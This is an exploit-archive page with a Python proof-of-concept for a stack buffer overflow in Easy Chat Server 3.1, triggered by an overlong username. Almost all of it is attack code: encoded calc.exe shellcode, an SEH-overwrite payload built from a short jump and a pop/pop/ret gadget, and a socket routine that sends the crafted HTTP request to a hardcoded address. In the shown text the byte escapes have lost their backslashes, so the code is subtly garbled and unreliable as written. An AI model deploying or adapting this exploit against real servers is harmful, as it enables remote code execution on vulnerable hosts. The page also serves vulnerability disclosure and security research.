Home / exploits Easy Chat Server 3.1 Stack Buffer Overflow
Posted on 13 May 2014
# Exploit Title: Easy Chat Server 3.1 stack buffer overflow # Date: 9 May 2014 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://www.echatserver.com/ # Software Link: http://www.echatserver.com/ # Version: 3.1 # Tested on: Windows 7 Enterprise SP1, English # # Description: # A buffer overflow is triggered when when passing a long username. import socket import struct # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/ # msfencode -b "x00x20" -i w32-exec-calc-shellcode.bin # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1) shellcode = ( "xd9xcbxbexb9x23x67x31xd9x74x24xf4x5ax29xc9" + "xb1x13x31x72x19x83xc2x04x03x72x15x5bxd6x56" + "xe3xc9x71xfax62x81xe2x75x82x0bxb3xe1xc0xd9" + "x0bx61xa0x11xe7x03x41x84x7cxdbxd2xa8x9ax97" + "xbax68x10xfbx5bxe8xadx70x7bx28xb3x86x08x64" + "xacx52x0ex8dxddx2dx3cx3cxa0xfcxbcx82x23xa8" + "xd7x94x6ex23xd9xe3x05xd4x05xf2x1bxe9x09x5a" + "x1cx39xbd" ) # SEH overwritten at offset 207 when Easy Chat Server is # installed in C:Program FilesEFS SoftwareEasy Chat Server payload = "A"*203 payload += "xebx06x90x90" # short jmp to shellcode payload += "x1ex0ex01x10" # pop/pop/ret @ 0x10010E1E SSLEAY32.DLL payload += "x81xc4xd8xfexffxff" # add esp,-128 payload += shellcode # calc.exe payload += "D"*193 buf = ( "GET /chat.ghp?username=" + payload + "&password=&room=1&sex=1 HTTP/1.1 " "User-Agent: Mozilla/4.0 " "Host: 192.168.1.136:80 " "Accept-Language: en-us " "Accept-Encoding: gzip, deflate " "Referer: http://192.168.1.136 " "Connection: Keep-Alive " ) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.123.131", 80)) s.send(buf) print s.recv(1024)
